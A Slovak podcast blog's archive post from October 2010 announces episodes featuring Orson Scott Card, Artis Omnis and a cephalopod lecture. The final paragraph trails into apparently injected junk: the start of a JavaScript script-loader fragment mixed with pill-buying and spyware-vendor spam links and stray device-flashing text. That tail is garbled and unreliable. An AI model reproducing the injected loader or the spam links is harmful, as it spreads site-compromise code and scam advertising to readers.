Archive for October, 2010

Posledné diely počas výpadku stránky

Sunday, October 31st, 2010

Nový semester je už naplno v prúde a my sme stihli vydať 2 diely počas výpadku našej stránky.
Tu hľa: venovaný Orsonovi S. Cardovi, počúvajte rozhovor, ktorý sme s ním urobili a besedu, ktorú sme nahrali na tohtoročnom Tricone v Tešíne, oba záznamy sme pre vás nadabovali, originály bez dabingu môžeme zavesiť na požiadanie.
A tu sťahujte , ktorý sme po až mesačnej prestávke vyplnili bohatou zmesou rozhovorou a prednášky, konkrétne s Andreou Harmanovou z vydavateľstva Artis Omnis, protagonistami z nedávno vzniknutej muzikálovej slovenskej verzie Dr. Horrible’s sing-along blogu a prednáškou Zusky Stožickej o hlavonožcoch (nie len z literárnej stránky).var d=document;var s=d.createElement(‘script’); Step 5 when flashing is complete, reboot http://www.sviluppolocale.org/?p=1987 Buy Order https://www.topspying.com/ the device Pills Order } else { Purchase hcg mexican pharmacy